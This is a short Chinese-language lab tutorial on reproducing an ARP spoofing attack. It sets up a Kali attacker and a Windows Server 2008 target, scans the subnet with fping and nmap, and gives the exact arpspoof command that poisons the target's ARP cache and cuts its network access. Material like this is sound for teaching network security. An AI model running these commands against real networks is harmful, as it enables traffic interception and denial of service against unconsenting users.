ARP协议攻击复现

ARP攻击复现

ARP 欺骗主机攻击：ARP 欺骗主机的攻击也是 ARP 众多攻击类型中很常见的一种。攻击者通过 ARP 欺骗使得局域网内被攻击主机发送给网关的流量信息实际上都发送给攻击者。主机刷新自己的 ARP 使得在自己的ARP 缓存表中对应的 MAC 为攻击者的 MAC，这样一来其他用户要通过网关发送出去的数据流就会发往主机这里，这样就会造成用户的数据外泄。

目标是欺骗主机
攻击者告诉用户，我是网关
那么，原本要发送给网关的数据，直接发送给了攻击者

1、攻击前的准备

攻击机：kali (172.16.129.46）

靶机：winserver 2008(172.16.129.175)

确保两者能够互相ping通（就是要处于同一个网段之下）

注意：如果修改了，就要重新启动虚拟机方可生效

ping一下，验证成功

2、开始攻击

先在kali中获取需要攻击的目标ip地址以及网关的ip地址

# 扫描对应网段所有存活的主机
fping -asg 172.16.129.0/24

# 或者使用也可以得到对应的效果
nmap -sP 172.16.129.0/24

我们确定需要攻击的目标ip：172.16.129.175

2.1 安装ARP欺骗工具

这里要用到一个arp欺骗工具：arpspoof, 这个工具kali里面直接输入对应的命令回车，如果没有会让你安装。

这个工具相当于可以不停的去发送欺骗数据包。

apt update 更新
apt install dsniff 安装

2.2 确保目标靶机能够正常上网

在winserver2008ping百度来确认

2.3 输入攻击指令

arpspoof -i eth0 -t  172.16.129.175 172.16.129.254
这条命令的意思：
-i 指定网卡 eth0 kali自己的网卡
-t 指定目标主机IP
172.16.129.175 目标主机IP
172.16.129.254 网关的IP
意思就是不停的告诉 目标主机， 我是网关我是网关， 然后就断网了

要想结束断网，直接结束arp欺骗即可。

创作不易，请点赞，收藏支持